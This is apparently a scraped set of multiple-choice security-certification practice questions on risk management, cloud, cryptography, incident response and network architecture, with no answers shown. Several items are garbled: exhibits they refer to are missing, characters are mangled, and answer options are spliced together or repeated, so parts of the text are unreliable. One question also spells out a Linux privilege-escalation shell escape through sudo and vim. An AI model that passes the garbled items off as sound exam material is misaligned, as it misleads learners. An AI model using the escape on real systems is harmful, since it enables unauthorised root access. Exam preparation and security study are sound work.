An organization is referencing NIST best practices for BCP creation while reviewing current internal organizational processes for mission-essential items.
Which of the following phases establishes the identification and prioritization of critical systems and functions? A. Review a recent gap analysis. B. Perform a cost-benefit analysis. C. Conduct a business impact analysis. D. Develop an exposure factor matrix.
An organization is preparing to migrate its production environment systems from an on-premises environment to a cloud service. The lead security architect is concerned that the organization's current methods for addressing risk may not be possible in the cloud environment.
Which of the following BEST describes the reason why traditional methods of addressing risk may not be possible in the cloud? A. Migrating operations assumes the acceptance of all risk. B. Cloud providers are unable to avoid risk. C. Specific risks cannot be transferred to the cloud provider. D. Risks to data in the cloud cannot be mitigated.
A company created an external application for its customers. A security researcher now reports that the application has a serious LDAP injection vulnerability that could be leveraged to bypass authentication and authorization.
Which of the following actions would BEST resolve the issue? (Choose two.) A. Conduct input sanitization.
B. Deploy a SIEM. C. Use containers. D. Patch the OS E. Deploy a WAF. F. Deploy a reverse proxy G. Deploy an IDS.
In preparation for the holiday season, a company redesigned the system that manages retail sales and moved it to a cloud service provider. The new infrastructure did not meet the company's availability requirements. During a postmortem analysis, the following issues were highlighted:
1. International users reported latency when images on the web page were initially loading.
2. During times of report processing, users reported issues with inventory when attempting to place orders.
3. Despite the fact that ten new API servers were added, the load across servers was heavy at peak times.
Which of the following infrastructure design changes would be BEST for the organization to implement to avoid these issues in the future? A. Serve static content via distributed CDNs, create a read replica of the central database and pull reports from there, and auto-scale API servers based on performance. B. Increase the bandwidth for the server that delivers images, use a CDN, change the database to a non-relational database, and split the ten API servers across two load balancers.
C. Serve images from an object storage bucket with infrequent read times, replicate the database across different regions, and dynamically create API servers based on load. D. Serve static-content object storage across different regions, increase the instance size on the managed relational database, and distribute the ten API servers across multiple regions.
During a remodel, a company's computer equipment was moved to a secure storage room with cameras positioned on both sides of the door. The door is locked using a card reader issued by the security team, and only the security team and department managers have access to the room. The company wants to be able to identify any unauthorized individuals who enter the storage room by following an authorized employee.
Which of the following processes would BEST satisfy this requirement? A. Monitor camera footage corresponding to a valid access request. B. Require both security and management to open the door. C. Require department managers to review denied-access requests. D. Issue new entry badges on a weekly basis.
A company is preparing to deploy a global service.
Which of the following must the company do to ensure GDPR compliance? (Choose two.) A. Inform users regarding what data is stored. B. Provide opt-in/out for marketing messages. C. Provide data deletion capabilities. D. Provide optional data encryption. E. Grant data access to third parties. F. Provide alternative authentication techniques.
A SOC analyst is reviewing malicious activity on an external, exposed web server. During the investigation, the analyst determines specific traffic is not being logged, and there is no visibility from the WAF for the web application.
Which of the following is the MOST likely cause? A. The user agent client is not compatible with the WAF. B. A certificate on the WAF is expired. C. HTTP traffic is not forwarding to HTTPS to decrypt. D. Old, vulnerable cipher suites are still being used.
A security analyst is reviewing the following output: Which of the following would BEST mitigate this type of attack? A. Installing a network firewall B. Placing a WAF inline C. Implementing an IDS D. Deploying a honeypot.
Which of the following terms refers to the delivery of encryption keys to a CASB or a third-party entity? A. Key sharing B. Key distribution
C. Key recovery D. Key escrow.
An organization is implementing a new identity and access management architecture with the following objectives:
✑ Supporting MFA against on-premises infrastructure
✑ Improving the user experience by integrating with SaaS applications
✑ Applying risk-based policies based on location
✑ Performing just-in-time provisioning
Which of the following authentication protocols should the organization implement to support these requirements? A. Kerberos and TACACS B. SAML and RADIUS C. OAuth and OpenID D. OTP and 802.1X.
Which of the following allows computation and analysis of data within a ciphertext without knowledge of the plaintext? A. Lattice-based cryptography
B. Quantum computing C. Asymmetric cryptography D. Homomorphic encryption.
A company is looking to fortify its cybersecurity defenses and is focusing on its network infrastructure. The solution cannot affect the availability of the company's services to ensure false positives do not drop legitimate traffic.
Which of the following would satisfy the requirement? A. NIDS B. NIPS C. WAF D. Reverse proxy.
A disaster recovery team learned of several mistakes that were made during the last disaster recovery parallel test. Computational resources ran out at 70% of restoration of critical services.
Which of the following should be modified to prevent the issue from reoccurring? A. Recovery point objective B. Recovery time objective C. Mission-essential functions D. Recovery service level.
A technician is reviewing the logs and notices a large number of files were transferred to remote sites over the course of three months. This activity then stopped.
The files were transferred via TLS-protected HTTP sessions from systems that do not send traffic to those sites.
The technician will define this threat as: A. a decrypting RSA using obsolete and weakened encryption attack. B. a zero-day attack.
C. an advanced persistent threat.
D. an on-path attack.
A security engineer thinks the development team has been hard-coding sensitive environment variables in its code.
Which of the following would BEST secure the company's CI/CD pipeline? A. Utilizing a trusted secrets manager B. Performing DAST on a weekly basis C. Introducing the use of container orchestration D. Deploying instance tagging.
A small company recently developed prototype technology for a military program. The company's security engineer is concerned about potential theft of the newly developed, proprietary information.
Which of the following should the security engineer do to BEST manage the threats proactively? A. Join an information-sharing community that is relevant to the company. B. Leverage the MITRE ATT&CK framework to map the TTP. C. Use OSINT techniques to evaluate and analyze the threats. D. Update security awareness training to address new threats, such as best practices for data security.
A security engineer has been asked to close all non-secure connections from the corporate network. The engineer is attempting to understand why the corporate
UTM will not allow users to download email via IMAPS. The engineer formulates a theory and begins testing by creating the firewall ID 58, and users are able to download emails correctly by using IMAP instead. The network comprises three VLANs: A. Contact the email service provider and ask if the company IP is blocked. B. Confirm the email server certificate is installed on the corporate computers. C. Make sure the UTM certificate is imported on the corporate computers.
D. Create an IMAPS firewall rule to ensure email is allowed.
A security analyst is reviewing network connectivity on a Linux workstation and examining the active TCP connections using the command line.
Which of the following commands would be the BEST to run to view only active Internet connections? A. sudo netstat -antu | grep ג€LISTENג€ | awk '{print$5}' B. sudo netstat -nlt -p | grep ג€ESTABLISHEDג€ C. sudo netstat -plntu | grep -v ג€Foreign Addressג€ D. sudo netstat -pnut -w | column -t -s $'\w' E. sudo netstat -pnut | grep -P ^tcp.
A shipping company that is trying to eliminate entire classes of threats is developing an SELinux policy to ensure its custom Android devices are used exclusively for package tracking.
After compiling and implementing the policy, in which of the following modes must the company ensure the devices are configured to run? A. Protecting
B. Permissive C. Enforcing
D. Mandatory.
A security analyst receives an alert from the SIEM regarding unusual activity on an authorized public SSH jump server. To further investigate, the analyst pulls the event logs directly from /var/log/auth.log: graphic.ssh_auth_log.
Which of the following actions would BEST address the potential risks posed by the activity in the logs? A. Altering the misconfigured service account password B. Modifying the AllowUsers configuration directive C. Restricting external port 22 access D. Implementing host-key preferences.
A high-severity vulnerability was found on a web application and introduced to the enterprise. The vulnerability could allow an unauthorized user to utilize an open- source library to view privileged user information. The enterprise is unwilling to accept the risk, but the developers cannot fix the issue right away.
Which of the following should be implemented to reduce the risk to an acceptable level until the issue can be fixed? A. Scan the code with a static code analyzer, change privileged user passwords, and provide security training.
B. Change privileged usernames, review the OS logA. Scan the code with a static code analyzer, change privileged user passwords, and provide security training. B. Change privileged usernames, review the OS logs, and deploy hardware tokens. C. Implement MFA, review the application logs, and deploy a WAF. D. Deploy a VPN, configure an official open-source library repository, and perform a full application review for vulnerabilities.s, and deploy hardware tokens.
.
A security analyst discovered that the company's WAF was not properly configured. The main web server was breached, and the following payload was found in one of the malicious requests: Which of the following would BEST mitigate this vulnerability? A. CAPTCHA B. Input validation C. Data encoding D. Network intrusion prevention.
A university issues badges through a homegrown identity management system to all staff and students. Each week during the summer, temporary summer school students arrive and need to be issued a badge to access minimal campus resources. The security team received a report from an outside auditor indicating the homegrown system is not consistent with best practices in the security field and leaves the institution vulnerable.
Which of the following should the security team recommend FIRST? A. Investigating a potential threat identified in logs related to the identity management system B. Updating the identity management system to use discretionary access control C. Beginning research on two-factor authentication to later introduce into the identity management system D. Working with procurement and creating a requirements document to select a new IAM system/vendor.
A customer reports being unable to connect to a website at www.test.com to consume services. The customer notices the web application has the following published cipher suite:Which of the following is the MOST likely cause of the customer's inability to connect? A. Weak ciphers are being used. B. The public key should be using ECDSA. C. The default should be on port 80. D. The server name should be test.com.
An IT administrator is reviewing all the servers in an organization and notices that a server is missing crucial practice against a recent exploit that could gain root access.
Which of the following describes the administrator's discovery? A. A vulnerability B. A threat C. A breach D. A risk.
A security analyst is performing a vulnerability assessment on behalf of a client. The analyst must define what constitutes a risk to the organization.
Which of the following should be the analyst's FIRST action? A. Create a full inventory of information and data assets. B. Ascertain the impact of an attack on the availability of crucial resources. C. Determine which security compliance standards should be followed. D. Perform a full system penetration test to determine the vulnerabilities.
While investigating a security event, an analyst finds evidence that a user opened an email attachment from an unknown source. Shortly after the user opened the attachment, a group of servers experienced a large amount of network and resource activity. Upon investigating the servers, the analyst discovers the servers were encrypted by ransomware that is demanding payment within 48 hours or all data will be destroyed. The company has no response plans for ransomware.
Which of the following is the NEXT step the analyst should take after reporting the incident to the management team? A. Pay the ransom within 48 hours. B. Isolate the servers to prevent the spread. C. Notify law enforcement. D. Request that the affected servers be restored immediately.
A company plans to build an entirely remote workforce that utilizes a cloud-based infrastructure. The Chief Information Security Officer asks the security engineer to design connectivity to meet the following requirements:
✑ Only users with corporate-owned devices can directly access servers hosted by the cloud provider.
✑ The company can control what SaaS applications each individual user can access.
✑ User browser activity can be monitored.
Which of the following solutions would BEST meet these requirements? A. IAM gateway, MDM, and reverse proxy B. VPN, CASB, and secure web gateway C. SSL tunnel, DLP, and host-based firewall D. API gateway, UEM, and forward proxy.
During a system penetration test, a security engineer successfully gained access to a shell on a Linux host as a standard user and wants to elevate the privilege levels.
Which of the following is a valid Linux post-exploitation method to use to accomplish this goal? A. Spawn a shell using sudo and an escape string such as sudo vim -c '!sh'. B. Perform ASIC password cracking on the host. C. Read the /etc/passwd file to extract the usernames. D. Initiate unquoted service path exploits. E. Use the UNION operator to extract the database schema.
A systems administrator is in the process of hardening the host systems before connecting to the network. The administrator wants to add protection to the boot loader to ensure the hosts are secure before the OS fully boots.
Which of the following would provide the BEST boot loader protection? A. TPM B. HSM C. PKI D. UEFI/BIOS.
A developer is creating a new mobile application for a company. The application uses REST API and TLS 1.2 to communicate securely with the external back-end server. Due to this configuration, the company is concerned about HTTPS interception attacks.
Which of the following would be the BEST solution against this type of attack? A. Cookies B. Wildcard certificates C. HSTS
D. Certificate pinning.
A user in the finance department uses a laptop to store a spreadsheet that contains confidential financial information for the company. Which of the following would be the BEST way to protect the file while the user travels between locations? (Choose two.) A. Encrypt the laptop with full disk encryption.
B. Back up the file to an encrypted flash drive. C. Place an ACL on the file to only allow access to specified users. D. Store the file in the user profile. E. Place an ACL on the file to deny access to everyone. F. Enable access logging on the file.
A threat hunting team receives a report about possible APT activity in the network.
Which of the following threat management frameworks should the team implement? A. NIST SP 800-53 B. MITRE ATT&CK
C. The Cyber Kill Chain D. The Diamond Model of Intrusion Analysis.
Device event logs sourced from MDM software as follows:Which of the following security concerns and response actions would BEST address the risks posed by the device in the logs? A. Malicious installation of an application; change the MDM configuration to remove application ID 1220. B. Resource leak; recover the device for analysis and clean up the local storage. C. Impossible travel; disable the device's account and access while investigating. D. Falsified status reporting; remotely wipe the device.
An energy company is required to report the average pressure of natural gas used over the past quarter. A PLC sends data to a historian server that creates the required reports.
Which of the following historian server locations will allow the business to get the required reports in an ׀׀¢ and IT environment? A. In the ׀׀¢ environment, use a VPN from the IT environment into the ׀׀¢ environment. B. In the ׀׀¢ environment, allow IT traffic into the ׀׀¢ environment. C. In the IT environment, allow PLCs to send data from the ׀׀¢ environment to the IT environment. D. Use a screened subnet between the ׀׀¢ and IT environments.
Which of the following is a benefit of using steganalysis techniques in forensic response? A. Breaking a symmetric cipher used in secure voice communications B. Determining the frequency of unique attacks against DRM-protected media C. Maintaining chain of custody for acquired evidence D. Identifying least significant bit encoding of data in a .wav file.
A new web server must comply with new secure-by-design principles and PCI DSS. This includes mitigating the risk of an on-path attack. A security analyst is reviewing the following web server configuration:Which of the following ciphers should the security analyst remove to support the business requirements? A. TLS_AES_128_CCM_8_SHA256 B. TLS_DHE_DSS_WITH_RC4_128_SHA C. TLS_CHACHA20_POLY1305_SHA256 D. TLS_AES_128_GCM_SHA256.
A security analyst notices a number of SIEM events that show the following activity:Which of the following response actions should the analyst take FIRST? A. Disable powershell.exe on all Microsoft Windows endpoints. B. Restart Microsoft Windows Defender. C. Configure the forward proxy to block 40.90.23.154. D. Disable local administrator privileges on the endpoints.
A company has hired a third party to develop software as part of its strategy to be quicker to market. The company's policy outlines the following requirements:
✑ The credentials used to publish production software to the container registry should be stored in a secure location.
✑ Access should be restricted to the pipeline service account, without the ability for the third-party developer to read the credentials directly.
Which of the following would be the BEST recommendation for storing and monitoring access to these shared credentials? A. TPM B. Local secure password file C. MFA D. Key vault.
A business stores personal client data of individuals residing in the EU in order to process requests for mortgage loan approvals.
Which of the following does the business's IT manager need to consider? A. The availability of personal data B. The right to personal data erasure C. The company's annual revenue D. The language of the web application.
A company publishes several APIs for customers and is required to use keys to segregate customer data sets.
Which of the following would be BEST to use to store customer keys? A. A trusted platform module B. A hardware security module C. A localized key store D. A public key infrastructure.
An organization wants to perform a scan of all its systems against best practice security configurations.
Which of the following SCAP standards, when combined, will enable the organization to view each of the configuration checks in a machine-readable checklist format for full automation? (Choose two.) A. ARF B. XCCDF C. CPE D. CVE E. CVSS F. OVAL.
A company is migrating from company-owned phones to a BYOD strategy for mobile devices. The pilot program will start with the executive management team and be rolled out to the rest of the staff in phases. The company's Chief Financial Officer loses a phone multiple times a year.
Which of the following will MOST likely secure the data on the lost device? A. Require a VPN to be active to access company data. B. Set up different profiles based on the person's risk. C. Remotely wipe the device. D. Require MFA to access company applications.
A security architect works for a manufacturing organization that has many different branch offices. The architect is looking for a way to reduce traffic and ensure the branch offices receive the latest copy of revoked certificates issued by the CA at the organization's headquarters location. The solution must also have the lowest power requirement on the CA.
Which of the following is the BEST solution? A. Deploy an RA on each branch office. B. Use Delta CRLs at the branches. C. Configure clients to use OCSP. D. Send the new CRLs by using GPO.
After a security incident, a network security engineer discovers that a portion of the company's sensitive external traffic has been redirected through a secondary
ISP that is not normally used.
Which of the following would BEST secure the routes while allowing the network to function in the event of a single provider failure? A. Disable BGP and implement a single static route for each internal network. B. Implement a BGP route reflector. C. Implement an inbound BGP prefix list. D. Disable BGP and implement OSPF.
A company's SOC has received threat intelligence about an active campaign utilizing a specific vulnerability. The company would like to determine whether it is vulnerable to this active campaign.
Which of the following should the company use to make this determination? A. Threat hunting B. A system penetration test C. Log analysis within the SIEM tool D. The Cyber Kill Chain.
A security engineer needs to recommend a solution that will meet the following requirements:
✑ Identify sensitive data in the provider's network
✑ Maintain compliance with company and regulatory guidelines
✑ Detect and respond to insider threats, privileged user threats, and compromised accounts
✑ Enforce datacentric security, such as encryption, tokenization, and access control
Which of the following solutions should the security engineer recommend to address these requirements? A. WAF B. CASB C. SWG D. DLP.
A security engineer estimates the company's popular web application experiences 100 attempted breaches per day. In the past four years, the company's data has been breached two times.
Which of the following should the engineer report as the ARO for successful breaches? A. 0.5 B. 8 C. 50 D. 36,500.
A network architect is designing a new SD-WAN architecture to connect all local sites to a central hub site. The hub is then responsible for redirecting traffic to public cloud and datacenter applications. The SD-WAN routers are managed through a SaaS, and the same security policy is applied to staff whether working in the office or at a remote location. The main requirements are the following:
1. The network supports core applications that have 99.99% uptime.
2. Configuration updates to the SD-WAN routers can only be initiated from the management service.
3. Documents downloaded from websites must be scanned for malware.
Which of the following solutions should the network architect implement to meet the requirements? A. Reverse proxy, stateful firewalls, and VPNs at the local sites B. IDSs, WAFs, and forward proxy IDS C. DoS protection at the hub site, mutual certificate authentication, and cloud proxy D. IPSs at the hub, Layer 4 firewalls, and DLP.
A security engineer needs to implement a solution to increase the security posture of user endpoints by providing more visibility and control over local administrator accounts. The endpoint security team is overwhelmed with alerts and wants a solution that has minimal operational burdens. Additionally, the solution must maintain a positive user experience after implementation.
Which of the following is the BEST solution to meet these objectives? A. Implement Privileged Access Management (PAM), keep users in the local administrators group, and enable local administrator account monitoring. B. Implement PAM, remove users from the local administrators group, and prompt users for explicit approval when elevated privileges are required. C. Implement EDR, remove users from the local administrators group, and enable privilege escalation monitoring. D. Implement EDR, keep users in the local administrators group, and enable user behavior analytics.
An organization's hunt team thinks a persistent threats exists and already has a foothold in the enterprise network.
Which of the following techniques would be BEST for the hunt team to use to entice the adversary to uncover malicious activity? A. Deploy a SOAR tool. B. Modify user password history and length requirements. C. Apply new isolation and segmentation schemes. D. Implement decoy files on adjacent hosts.
A junior developer is informed about the impact of new malware on an Advanced RISC Machine (ARM) CPU, and the code must be fixed accordingly. Based on the debug, the malware is able to insert itself in another process memory location.
Which of the following technologies can the developer enable on the ARM architecture to prevent this type of malware? A. Execute never B. No-execute C. Total memory encryption D. Virtual memory protection.
A company is implementing SSL inspection. During the next six months, multiple web applications that will be separated out with subdomains will be deployed.
Which of the following will allow the inspection of the data without multiple certificate deployments? A. Include all available cipher suites. B. Create a wildcard certificate. C. Use a third-party CA. D. Implement certificate pinning.
A small business requires a low-cost approach to theft detection for the audio recordings it produces and sells.
Which of the following techniques will MOST likely meet the business's needs? A. Performing deep-packet inspection of all digital audio files B. Adding identifying filesystem metadata to the digital audio files C. Implementing steganography D. Purchasing and installing a DRM suite.
Clients are reporting slowness when attempting to access a series of load-balanced APIs that do not require authentication. The servers that host the APIs are showing heavy CPU utilization. No alerts are found on the WAFs sitting in front of the APIs.
Which of the following should a security engineer recommend to BEST remedy the performance issues in a timely manner? A. Implement rate limiting on the API. B. Implement geoblocking on the WAF. C. Implement OAuth 2.0 on the API. D. Implement input validation on the API.
An organization is considering a BYOD standard to support remote working. The first iteration of the solution will utilize only approved collaboration applications and the ability to move corporate data between those applications. The security team has concerns about the following:
✑ Unstructured data being exfiltrated after an employee leaves the organization
✑ Data being exfiltrated as a result of compromised credentials
✑ Sensitive information in emails being exfiltrated
Which of the following solutions should the security team implement to mitigate the risk of data loss? A. Mobile device management, remote wipe, and data loss detection B. Conditional access, DoH, and full disk encryption C. Mobile application management, MFA, and DRM D. Certificates, DLP, and geofencing.
A Chief Information Officer is considering migrating all company data to the cloud to save money on expensive SAN storage.
Which of the following is a security concern that will MOST likely need to be addressed during migration? A. Latency B. Data exposure C. Data loss D. Data dispersion.
Due to locality and budget constraints, an organization's satellite office has a lower bandwidth allocation than other offices in the organization. As a result, the local security infrastructure staff is assessing architectural options that will help preserve network bandwidth and increase speed to both internal and external resources while not sacrificing threat visibility.
Which of the following would be the BEST option to implement? A. Distributed connection allocation B. Local caching C. Content delivery network D. SD-WAN vertical heterogeneity.
A security analyst is concerned that a malicious piece of code was downloaded on a Linux system. After some research, the analyst determines that the suspected piece of code is performing a lot of input/output (I/O) on the disk drive.Based on the output above, from which of the following process IDs can the analyst begin an investigation? A. 65 B. 77 C. 83 D. 87.
Which of the following are risks associated with vendor lock-in? (Choose two.) A. The client can seamlessly move data. B. The vendor can change product offerings. C. The client receives a sufficient level of service. D. The client experiences decreased quality of service. E. The client can leverage a multicloud approach. F. The client experiences increased interoperability.
An organization recently experienced a ransomware attack. The security team leader is concerned about the attack reoccurring. However, no further security measures have been implemented.
Which of the following processes can be used to identify potential prevention recommendations? A. Detection B. Remediation
C. Preparation D. Recovery.
A security architect is implementing a web application that uses a database back end. Prior to the production, the architect is concerned about the possibility of
XSS attacks and wants to identify security controls that could be put in place to prevent these attacks.
Which of the following sources could the architect consult to address this security concern? A. SDLC B. OVAL C. IEEE D. OWASP.
A security engineer was auditing an organization's current software development practice and discovered that multiple open-source libraries were Integrated into the organization's software. The organization currently performs SAST and DAST on the software it develops.
Which of the following should the organization incorporate into the SDLC to ensure the security of the open-source libraries? A. Perform additional SAST/DAST on the open-source libraries. B. Implement the SDLC security guidelines. C. Track the library versions and monitor the CVE website for related vulnerabilities. D. Perform unit testing of the open-source libraries.
A security analyst is investigating a possible buffer overflow attack. The following output was found on a user's workstation: graphic.linux_randomization.prg
Which of the following technologies would mitigate the manipulation of memory segments? A. NX bit B. ASLR C. DEP D. HSM.
An e-commerce company is running a web server on premises, and the resource utilization is usually less than 30%. During the last two holiday seasons, the server experienced performance issues because of too many connections, and several customers were not able to finalize purchase orders. The company is looking to change the server configuration to avoid this kind of performance issue.
Which of the following is the MOST cost-effective solution? A. Move the server to a cloud provider. B. Change the operating system. C. Buy a new server and create an active-active cluster. D. Upgrade the server with a new one.
A company has decided to purchase a license for software that is used to operate a mission-critical process. The third-party developer is new to the industry but is delivering what the company needs at this time.
Which of the following BEST describes the reason why utilizing a source code escrow will reduce the operational risk to the company if the third party stops supporting the application? A. The company will have access to the latest version to continue development. B. The company will be able to force the third-party developer to continue support. C. The company will be able to manage the third-party developer's development process. D. The company will be paid by the third-party developer to hire a new development team.
A security analyst is researching containerization concepts for an organization. The analyst is concerned about potential resource exhaustion scenarios on the
Docker host due to a single application that is overconsuming available resources.
Which of the following core Linux concepts BEST reflects the ability to limit resource allocation to containers? A. Union filesystem overlay B. Cgroups C. Linux namespaces D. Device mapper.
A developer wants to maintain integrity to each module of a program and ensure the code cannot be altered by malicious users.
Which of the following would be BEST for the developer to perform? (Choose two.) A. Utilize code signing by a trusted third party. B. Implement certificate-based authentication. C. Verify MD5 hashes.
D. Compress the program with a password. E. Encrypt with 3DES. F. Make the DACL read-only.
A company is moving most of its customer-facing production systems to the cloud-facing production systems to the cloud. IaaS is the service model being used.
The Chief Executive Officer is concerned about the type of encryption available and requires the solution must have the highest level of security.
Which of the following encryption methods should the cloud security engineer select during the implementation phase? A. Instance-based B. Storage-based C. Proxy-based D. Array controller-based.
A vulnerability analyst identified a zero-day vulnerability in a company's internally developed software. Since the current vulnerability management system does not have any checks for this vulnerability, an engineer has been asked to create one.
Which of the following would be BEST suited to meet these requirements? A. ARF B. ISACs C. Node.js D. OVAL.
An organization recently started processing, transmitting, and storing its customers' credit card information. Within a week of doing so, the organization suffered a massive breach that resulted in the exposure of the customers' information.
Which of the following provides the BEST guidance for protecting such information while it is at rest and in transit? A. NIST B. GDPR C. PCI DSS D. ISO.
Which of the following is the MOST important security objective when applying cryptography to control messages that tell an ICS how much electrical power to output? A. Improving the availability of messages B. Ensuring non-repudiation of messages C. Enforcing protocol conformance for messages D. Assuring the integrity of messages.
A company wants to protect its intellectual property from theft. The company has already applied ACLs and DACs.
Which of the following should the company use to prevent data theft? A. Watermarking B. DRM C. NDA D. Access logging.
A satellite communications ISP frequently experiences outages and degraded modes of operation over one of its legacy satellite links due to the use of deprecated hardware and software. Three days per week, on average, a contracted company must follow a checklist of 16 different high-latency commands that must be run in serial to restore nominal performance. The ISP wants this process to be automated.
Which of the following techniques would be BEST suited for this requirement? A. Deploy SOAR utilities and runbooks. B. Replace the associated hardware. C. Provide the contractors with direct access to satellite telemetry data. D. Reduce link latency on the affected ground and satellite segments.
A company processes data subject to NDAs with partners that define the processing and storage constraints for the covered data. The agreements currently do not permit moving the covered data to the cloud, and the company would like to renegotiate the terms of the agreements.
Which of the following would MOST likely help the company gain consensus to move the data to the cloud? A. Designing data protection schemes to mitigate the risk of loss due to multitenancy B. Implementing redundant stores and services across diverse CSPs for high availability C. Emulating OS and hardware architectures to blur operations from CSP view D. Purchasing managed FIM services to alert on detected modifications to covered data.
Ransomware encrypted the entire human resources fileshare for a large financial institution. Security operations personnel were unaware of the activity until it was too late to stop it. The restoration will take approximately four hours, and the last backup occurred 48 hours ago. The management team has indicated that the
RPO for a disaster recovery event for this data classification is 24 hours.
Based on RPO requirements, which of the following recommendations should the management team make? A. Leave the current backup schedule intact and pay the ransom to decrypt the data. B. Leave the current backup schedule intact and make the human resources fileshare read-only. C. Increase the frequency of backups and create SIEM alerts for IOCs. D. Decrease the frequency of backups and pay the ransom to decrypt the data.
A company undergoing digital transformation is reviewing the resiliency of a CSP and is concerned about meeting SLA requirements in the event of a CSP incident.
Which of the following would be BEST to proceed with the transformation? A. An on-premises solution as a backup B. A load balancer with a round-robin configuration C. A multicloud provider solution
D. An active-active solution within the same tenant.
A company has hired a security architect to address several service outages on the endpoints due to new malware. The Chief Executive Officer's laptop was impacted while working from home. The goal is to prevent further endpoint disruption. The edge network is protected by a web proxy.
Which of the following solutions should the security architect recommend? A. Replace the current antivirus with an EDR solution. B. Remove the web proxy and install a UTM appliance. C. Implement a deny list feature on the endpoints. D. Add a firewall module on the current antivirus solution.
All staff at a company have started working remotely due to a global pandemic. To transition to remote work, the company has migrated to SaaS collaboration tools. The human resources department wants to use these tools to process sensitive information but is concerned the data could be:
✑ Leaked to the media via printing of the documents
✑ Sent to a personal email address
Accessed and viewed by systems administrators
✑ Uploaded to a file storage site
Which of the following would mitigate the department's concerns? A. Data loss detection, reverse proxy, EDR, and PGP B. VDI, proxy, CASB, and DRM C. Watermarking, forward proxy, DLP, and MFA D. Proxy, secure VPN, endpoint encryption, and AV.
A home automation company just purchased and installed tools for its SOC to enable incident identification and response on software the company develops. The company would like to prioritize defenses against the following attack scenarios:
✑ Unauthorized insertions into application development environments
✑ Authorized insiders making unauthorized changes to environment configurations
Which of the following actions will enable the data feeds needed to detect these types of attacks on development environments? (Choose two.) A. Perform static code analysis of committed code and generate summary reports. B. Implement an XML gateway and monitor for policy violations. C. Monitor dependency management tools and report on susceptible third-party libraries. D. Install an IDS on the development subnet and passively monitor for vulnerable services. E. Model user behavior and monitor for deviations from normal. F. Continuously monitor code commits to repositories and generate summary logs.
An enterprise is deploying APIs that utilize a private key and a public key to ensure the connection string is protected. To connect to the API, customers must use the private key.
Which of the following would BEST secure the REST API connection to the database while preventing the use of a hard-coded string in the request string? A. Implement a VPN for all APIs B. Sign the key with DSA. C. Deploy MFA for the service accounts D. Utilize HMAC for the keys. .
An application server was recently upgraded to prefer TLS 1.3, and now users are unable to connect their clients to the server. Attempts to reproduce the error are confirmed, and clients are reporting the following:
ERR_SSL_VERSION_OR_CIPHER_MISMATCH
Which of the following is MOST likely the root cause? A. The client application is testing PFS.
C. The client application is configured to use RC4.B. The client application is configured to use ECDHE. C. The client application is configured to use RC4. D. The client application is configured to use AES-256 in GCM.
An organization is designing a network architecture that must meet the following requirements:
✑ Users will only be able to access predefined services.
✑ Each user will have a unique allow list defined for access.
✑ The system will construct one-to-one subject/object access paths dynamically.
Which of the following architectural designs should the organization use to meet these requirements? A. Peer-to-peer secure communications enabled by mobile applications B. Proxied application data connections enabled by API gateways C. Microsegmentation enabled by software-defined networking D. VLANs enabled by network infrastructure devices.
An organization developed a social media application that is used by customers in multiple remote geographic locations around the world. The organization's headquarters and only datacenter are located in New York City. The Chief Information Security Officer wants to ensure the following requirements are met for the social media application:
✑ Low latency for all mobile users to improve the users' experience
✑ SSL offloading to improve web server performance
✑ Protection against DoS and DDoS attacks
✑ High availability
Which of the following should the organization implement to BEST ensure all requirements are met? A. A cache server farm in its datacenter B. A load-balanced group of reverse proxy servers with SSL acceleration C. A CDN with the origin set to its datacenter
n D. Dual gigabit-speed Internet connections with managed DDoS prevention.
A systems administrator is preparing to run a vulnerability scan on a set of information systems in the organization. The systems administrator wants to ensure that the targeted systems produce accurate information especially regarding configuration settings.
Which of the following scan types will provide the systems administrator with the MOST accurate information? A. A passive, credentialed scan B. A passive, non-credentialed scan C. An active, non-credentialed scan D. An active, credentialed scan.
A networking team asked a security administrator to enable Flash on its web browser. The networking team explained that an important legacy embedded system gathers SNMP information from various devices. The system can only be managed through a web browser running Flash. The embedded system will be replaced within the year but is still critical at the moment.
Which of the following should the security administrator do to mitigate the risk? A. Explain to the networking team the reason Flash is no longer available and insist the team move up the timetable for replacement. B. Air gap the legacy system from the network and dedicate a laptop with an end-of-life OS on it to connect to the system via crossover cable for management. C. Suggest that the networking team contact the original embedded system's vendor to get an update to the system that does not require Flash. D. Isolate the management interface to a private VLAN where a legacy browser in a VM can be used as needed to manage the system.
Given the following log snippet from a web server:Which of the following BEST describes this type of attack? A. SQL injection B. Cross-site scripting C. Brute-force D. Cross-site request forgery.
A pharmaceutical company recently experienced a security breach within its customer-facing web portal. The attackers performed a SQL injection attack and exported tables from the company's managed database, exposing customer information.
The company hosts the application with a CSP utilizing the IaaS model. Which of the following parties is ultimately responsible for the breach? A. The pharmaceutical company B. The cloud software provider C. The web portal software vendor D. The database software vendor.
A host on a company's network has been infected by a worm that appears to be spreading via SMB. A security analyst has been tasked with containing the incident while also maintaining evidence for a subsequent investigation and malware analysis.
Which of the following steps would be best to perform FIRST? A. Turn off the infected host immediately. B. Run a full anti-malware scan on the infected host. C. Modify the smb.conf file of the host to prevent outgoing SMB connections. D. Isolate the infected host from the network by removing all network connections.
A company's product site recently had failed API calls, resulting in customers being unable to check out and purchase products. This type of failure could lead to the loss of customers and damage to the company's reputation in the market.
Which of the following should the company implement to address the risk of system unavailability? A. User and entity behavior analytics B. Redundant reporting systems C. A self-healing system D. Application controls.
Which of the following represents the MOST significant benefit of implementing a passwordless authentication solution? A. Biometric authenticators are immutable. B. The likelihood of account compromise is reduced. C. Zero trust is achieved. D. Privacy risks are minimized.
A review of the past year's attack patterns shows that attackers stopped reconnaissance after finding a susceptible system to compromise. The company would like to find a way to use this information to protect the environment while still gaining valuable attack information.
Which of the following would be BEST for the company to implement? A. A WAF B. An IDS C. A SIEM D. A honeypot.
A security architect is reviewing the following proposed corporate firewall architecture and configuration:Both firewalls are stateful and provide Layer 7 filtering and routing. The company has the following requirements:
✑ Web servers must receive all updates via HTTP/S from the corporate network.
Web servers should not initiate communication with the Internet.
✑ Web servers should only connect to preapproved corporate database servers.
✑ Employees' computing devices should only connect to web services over ports 80 and 443.
